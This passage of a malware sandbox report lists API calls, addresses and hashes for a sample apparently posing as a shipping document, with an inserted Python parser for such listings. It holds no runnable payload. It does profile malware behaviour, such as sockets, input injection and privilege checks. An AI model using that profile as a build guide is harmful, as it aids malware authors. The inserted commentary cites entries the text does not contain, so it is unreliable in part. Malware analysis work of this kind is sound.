                    • Instruction ID: b29d5da0cbd53a504a57be40a50e522e5dc6eaba1977028fad86c566a8a0868d
                    • Opcode Fuzzy Hash: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                    • Instruction Fuzzy Hash: 4EC18F74A04216EFCB14CFA8D884DAEB7B5FF48705B105999EC45EB250D730ED95CB90
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00E7E1D2
                    • CharLowerBuffW.USER32(?,?), ref: 00E7E215
                      • Part of subcall function 00E7D8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D8D9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E415
                    • _memmove.LIBCMT ref: 00E7E428
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: d1a538efc6a8b5f978d51f0e219664d0e2a22f0e7a5c1a8fdc897729c5a7f762
                    • Instruction ID: cdd3b415cfae9f7c67f81848641b10af932a2683a72138b2e42f63caa4a69cbf
                    • Opcode Fuzzy Hash: d1a538efc6a8b5f978d51f0e219664d0e2a22f0e7a5c1a8fdc897729c5a7f762
                    • Instruction Fuzzy Hash: F2C14B716083119FC704DF28C48196ABBE4FF89718F14996EF899AB392D731E945CF82
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00E781D8
                    • CoUninitialize.OLE32 ref: 00E781E3
                      • Part of subcall function 00E5D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D8E3
                    • VariantInit.OLEAUT32(?), ref: 00E781EE
                    • VariantClear.OLEAUT32(?), ref: 00E784BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: ae2598a06488ffc5a4c8319809fb68ba3afdd0c2904beb49fddf327eb1e129d8
                    • Instruction ID: dd11c6e270238fc60d0f535366c5beb4d1cce92e2be36cfa8b9c87b0b1d69e5a
                    • Opcode Fuzzy Hash: ae2598a06488ffc5a4c8319809fb68ba3afdd0c2904beb49fddf327eb1e129d8
                    • Instruction Fuzzy Hash: 46A16A756447019FDB10DF58C989B6AB7E4BF98724F04944CF99AAB3A2CB30ED44CB42
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: bd939a1e06addee710ebabb785e41ccc90967352e3b14fc7fc770db03351eb88
                    • Instruction ID: 99cd8777fccaaafa0b53552bf5dcf91f174b76390545ae77e154079616986d50
                    • Opcode Fuzzy Hash: bd939a1e06addee710ebabb785e41ccc90967352e3b14fc7fc770db03351eb88
                    • Instruction Fuzzy Hash: B351A6307443029BDB20AF65D495A69F3F5EF44315F60AC2FE996FB2A1DA7098888711
                    APIs
                    • GetWindowRect.USER32(00FCE200,?), ref: 00E89895
                    • ScreenToClient.USER32(00000002,00000002), ref: 00E898C8
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E89935
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 66c598728f059cbfdeb5cf1dd2d0736a015c3396de9d935c02680acd00f5e027
                    • Instruction ID: 16bd0d1ac88f357f19451b34501878ac0c228b920bcf46ec061276c2f53a5937
                    • Opcode Fuzzy Hash: 66c598728f059cbfdeb5cf1dd2d0736a015c3396de9d935c02680acd00f5e027
                    • Instruction Fuzzy Hash: EC511C35A00209AFCF14EF54D980ABE7BB5EF85324F149169F85DAB2A1D731AD81CB90
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00E76AE7
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76AF7
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76B5B
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76B67
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: d7ec7d00ea74ed3903f0d9e6e3c612750df8cf83b6f2c42b32d6b32d2f974fce
                    • Instruction ID: a599346a401085015ba8006d078e2da29c893d4fe538c2d251bcf3247028a736
                    • Opcode Fuzzy Hash: d7ec7d00ea74ed3903f0d9e6e3c612750df8cf83b6f2c42b32d6b32d2f974fce
                    • Instruction Fuzzy Hash: C741B035740600AFEB24AF28DC86F3A77E9AF44B14F449418FA59BB2D3DA709C418B91
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E765BD
                    • _strlen.LIBCMT ref: 00E765EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: ff07ff712d6206e0c8d92f59e4ddaeab84d0a921bf9cd2145ea393942bbb5928
                    • Instruction ID: 16671a40a983808790dc5f23a75e84451a1eccd5d6f63cb9a798dd2d71cb9542
                    • Opcode Fuzzy Hash: ff07ff712d6206e0c8d92f59e4ddaeab84d0a921bf9cd2145ea393942bbb5928
                    • Instruction Fuzzy Hash: B941D331A00504AFCB14EBA4EDD5EAEB3E9EF44314F549155F819BB2D2DB30AD44CB51
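                    The LoadLibraryA/GetProcAddress entries above (GetNativeSystemInfo, Wow64RevertWow64FsRedirection, Wow64DisableWow64FsRedirection, RegDeleteKeyExW, GetModuleHandleExW) record exports the AutoIt runtime resolves at run time, so they never show up as named imports, and the two WSOCK32 entries directly above carry calls IDA could name only by ordinal (#21.WSOCK32, #16.WSOCK32). Pulling a readable behaviour summary out of these listings is a manual chore. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses text laid out like these entries, pairs each GetProcAddress with the LoadLibrary in the same function entry, maps the BSD-function export ordinals that wsock32.dll shares with ws2_32.dll (16 = recv, 21 = setsockopt, 23 = socket) to names, and renders socket()/setsockopt() constants symbolically. SAMPLE is a constructed excerpt in this layout, and the ordinal and constant tables are the published Winsock values; both are assumptions of the example rather than data taken from the report.

```python
"""Extract run-time-resolved imports and ordinal-only Winsock calls from
Joe Sandbox "IDA Plugin" function entries.  Added example; SAMPLE below is a
constructed excerpt in the report's layout, not a copy of the report."""
import re
from typing import List, Optional, Tuple

SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00E04D2E), ref: 00E04D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04D81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00E810C1), ref: 00E80E80
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E92
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00E76AE7
• WSAGetLastError.WSOCK32(00000000), ref: 00E76AF7
• _memmove.LIBCMT ref: 00E7E428
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76B5B
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E765BD
"""

# One direct call line: "• name.MODULE(args), ref: ADDR" or "• name.MODULE ref: ADDR".
# "Part of subcall function" lines deliberately do not match (they belong to a callee).
CALL_RE = re.compile(
    r"^\s*•\s*(?P<name>#\d+|[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# BSD-socket export ordinals shared by wsock32.dll and ws2_32.dll (published values).
WSOCK_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
                  5: "getpeername", 6: "getsockname", 7: "getsockopt", 8: "htonl",
                  9: "htons", 10: "ioctlsocket", 11: "inet_addr", 12: "inet_ntoa",
                  13: "listen", 14: "ntohl", 15: "ntohs", 16: "recv", 17: "recvfrom",
                  18: "select", 19: "send", 20: "sendto", 21: "setsockopt",
                  22: "shutdown", 23: "socket"}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "0", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOL_SOCKET = 0xFFFF
SO_OPTS = {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0020: "SO_BROADCAST",
           0x1005: "SO_SNDTIMEO", 0x1006: "SO_RCVTIMEO"}
LOADERS = ("LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW")


def parse_calls(text: str) -> List[dict]:
    """Return one dict per direct API call, tagged with the function entry it sits in."""
    calls, entry = [], -1
    for line in text.splitlines():
        if line.strip() == "APIs":
            entry += 1                      # each "APIs" header opens a new function entry
            continue
        m = CALL_RE.match(line)
        if not m:
            continue                        # headers, hashes, subcall lines
        name, module = m.group("name"), m.group("module")
        if name.startswith("#") and module == "WSOCK32":
            name = WSOCK_ORDINALS.get(int(name[1:]), name)   # ordinal -> export name
        args = m.group("args")
        calls.append({"entry": entry, "name": name, "module": module,
                      "args": args.split(",") if args else [], "ref": m.group("ref")})
    return calls


def dynamic_imports(calls: List[dict]) -> List[Tuple[str, str, str]]:
    """(dll, export, ref) for every GetProcAddress of a named export, using the
    LoadLibrary/GetModuleHandle seen earlier in the same entry as the dll."""
    out, dll_by_entry = [], {}
    for c in calls:
        if c["name"] in LOADERS and c["args"]:
            dll_by_entry[c["entry"]] = c["args"][0].lower()
        elif c["name"] == "GetProcAddress" and len(c["args"]) >= 2:
            export = c["args"][1]
            if export != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", export):
                out.append((dll_by_entry.get(c["entry"], "?"), export, c["ref"]))
    return out


def _hex(a: str) -> Optional[int]:
    try:
        return int(a, 16)
    except ValueError:
        return None                         # "?" means the sandbox could not recover it


def describe_socket_calls(calls: List[dict]) -> List[str]:
    """Render WSOCK32 calls with socket()/setsockopt() constants named symbolically."""
    out = []
    for c in calls:
        if c["module"] != "WSOCK32":
            continue
        a = [_hex(x) for x in c["args"]]
        if c["name"] == "socket" and len(a) == 3:
            out.append("socket(%s, %s, %s)" % (AF.get(a[0], a[0]), SOCK.get(a[1], a[1]),
                                               PROTO.get(a[2], a[2])))
        elif c["name"] == "setsockopt" and len(a) >= 3:
            level = "SOL_SOCKET" if a[1] == SOL_SOCKET else a[1]
            opt = SO_OPTS.get(a[2], a[2]) if a[1] == SOL_SOCKET else a[2]
            out.append("setsockopt(s, %s, %s, ...)" % (level, opt))
        else:
            out.append(c["name"] + "(...)")
    return out


if __name__ == "__main__":
    found = parse_calls(SAMPLE)
    for dll, export, ref in dynamic_imports(found):
        print(f"{ref}: {dll}!{export} resolved at run time")
    for summary in describe_socket_calls(found):
        print(summary)
```

                    Run against the sample it reports kernel32.dll!Wow64DisableWow64FsRedirection and advapi32.dll!RegDeleteKeyExW as run-time-resolved, and decodes the ordinal calls as a UDP socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) with SO_BROADCAST set on it, followed by recv. Feeding it a whole exported report instead of SAMPLE gives the full list of APIs the import table does not name.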
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E6B92A
                    • GetLastError.KERNEL32(?,00000000), ref: 00E6B950
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E6B975
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E6B9A1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 088bef4657493450c21b7bce75156f02f9495de7870a43628e19588addae3e79
                    • Instruction ID: 891cdb7cec19d7af7036bef4096e8e1ed9651c0c5397cb923fb50b92cf6892b2
                    • Opcode Fuzzy Hash: 088bef4657493450c21b7bce75156f02f9495de7870a43628e19588addae3e79
                    • Instruction Fuzzy Hash: 69412839600610DFCB10EF59D484A59BBF1EF89314B099098E94AAB7A3CB30FD80CB91
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E88910
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 81b09688cd49f0e3753d9ab50f59e49b3083a96265cad798055c3f6be632683c
                    • Instruction ID: f58abd2b88bab324ec6e9a346852b8a6fc6fb0a8fe8205c3938b9ed4e65708eb
                    • Opcode Fuzzy Hash: 81b09688cd49f0e3753d9ab50f59e49b3083a96265cad798055c3f6be632683c
                    • Instruction Fuzzy Hash: E731E334640108BFEF24AE58CE49BB837A5EB85314FD06126FE5DF62E0CE31A9809742
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00E8AB92
                    • GetWindowRect.USER32(?,?), ref: 00E8AC08
                    • PtInRect.USER32(?,?,00E8C07E), ref: 00E8AC18
                    • MessageBeep.USER32(00000000), ref: 00E8AC89
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                    • Instruction ID: 98abf6983174126790755e2474b1df353606008db3da5e660dfe752e3d9b29ec
                    • Opcode Fuzzy Hash: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                    • Instruction Fuzzy Hash: 75418D71600114DFEB15EF59C884EA9BBF5FB48314F1891BAE41CAB261D731A845CB92
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E60E58
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E60E74
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E60EDA
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E60F2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                    • Instruction ID: c762dee1eea4856be191e2012bdebc3d8901e1249f0596e5cca257e06a186ad7
                    • Opcode Fuzzy Hash: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                    • Instruction Fuzzy Hash: 5A315930AC0238AEFF348B25A814BFB7BA5EB483A4F18661AF094711D1C3768D459791
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E60F97
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E60FB3
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E61012
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E61064
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                    • Instruction ID: 818b389bb0283b228d91804de3f53b66a7ea57b295528be0c5cfb1c5de883efb
                    • Opcode Fuzzy Hash: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                    • Instruction Fuzzy Hash: A4319E30AC0298DEFF318B25E8087FB77A6AB44395F1C525AE045711E1C3744DC59791
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E3637B
                    • __isleadbyte_l.LIBCMT ref: 00E363A9
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E363D7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E3640D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: c695a8702ac91ebabe83979bb3b96146df07a1d004acbe61138e71d0b0f437f1
                    • Instruction ID: 141f8ac902f8f9da9dc898b350a11c2bb85a814f25d31cb2139ea75debe8affa
                    • Opcode Fuzzy Hash: c695a8702ac91ebabe83979bb3b96146df07a1d004acbe61138e71d0b0f437f1
                    • Instruction Fuzzy Hash: 5A31B031A00256FFDB218F75C888BAE7FB5FF81314F159029E864AB1A1E731D850DBA0
                    APIs
                    • GetForegroundWindow.USER32 ref: 00E84F6B
                      • Part of subcall function 00E63685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E6369F
                      • Part of subcall function 00E63685: GetCurrentThreadId.KERNEL32 ref: 00E636A6
                      • Part of subcall function 00E63685: AttachThreadInput.USER32(00000000,?,00E650AC), ref: 00E636AD
                    • GetCaretPos.USER32(?), ref: 00E84F7C
                    • ClientToScreen.USER32(00000000,?), ref: 00E84FB7
                    • GetForegroundWindow.USER32 ref: 00E84FBD
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 47de9d391407a5eb36391f4f2f3d733d09136974f2d7f8443bc800ec012c640f
                    • Instruction ID: 3072ece534d201473379bcfbb8e361bf02ecd8c861e6c60a79a549fefa8a10d2
                    • Opcode Fuzzy Hash: 47de9d391407a5eb36391f4f2f3d733d09136974f2d7f8443bc800ec012c640f
                    • Instruction Fuzzy Hash: 4E311E72A00108AFDB00EFB5C8859EFB7F9EF98304F11506AE515F7252EA759E45CBA0
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetCursorPos.USER32(?), ref: 00E8C53C
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3BB2B,?,?,?,?,?), ref: 00E8C551
                    • GetCursorPos.USER32(?), ref: 00E8C59E
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3BB2B,?,?,?), ref: 00E8C5D8
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                    • Instruction ID: 25a693c5eae38c3364574c9c3b4d07000cdf9b348a363972a334ed52fadd9c8e
                    • Opcode Fuzzy Hash: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                    • Instruction Fuzzy Hash: 5A31D236600418AFCF15DF55D858EEA7BF9EB4A310F144069F90DAB2A1C731AD51DBA0
                    APIs
                      • Part of subcall function 00E58432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58449
                      • Part of subcall function 00E58432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58453
                      • Part of subcall function 00E58432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58462
                      • Part of subcall function 00E58432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58469
                      • Part of subcall function 00E58432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5847F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E589CB
                    • _memcmp.LIBCMT ref: 00E589EE
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E58A24
                    • HeapFree.KERNEL32(00000000), ref: 00E58A2B
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 087f5ee60a7e45e90457d49404e74c8a0512a4d1b9562552c58a5fed3b6733a0
                    • Instruction ID: b6a6f5a664cccc0455126d2217cc12f5f12729b52d81c1c4a9f3c27f1a08e739
                    • Opcode Fuzzy Hash: 087f5ee60a7e45e90457d49404e74c8a0512a4d1b9562552c58a5fed3b6733a0
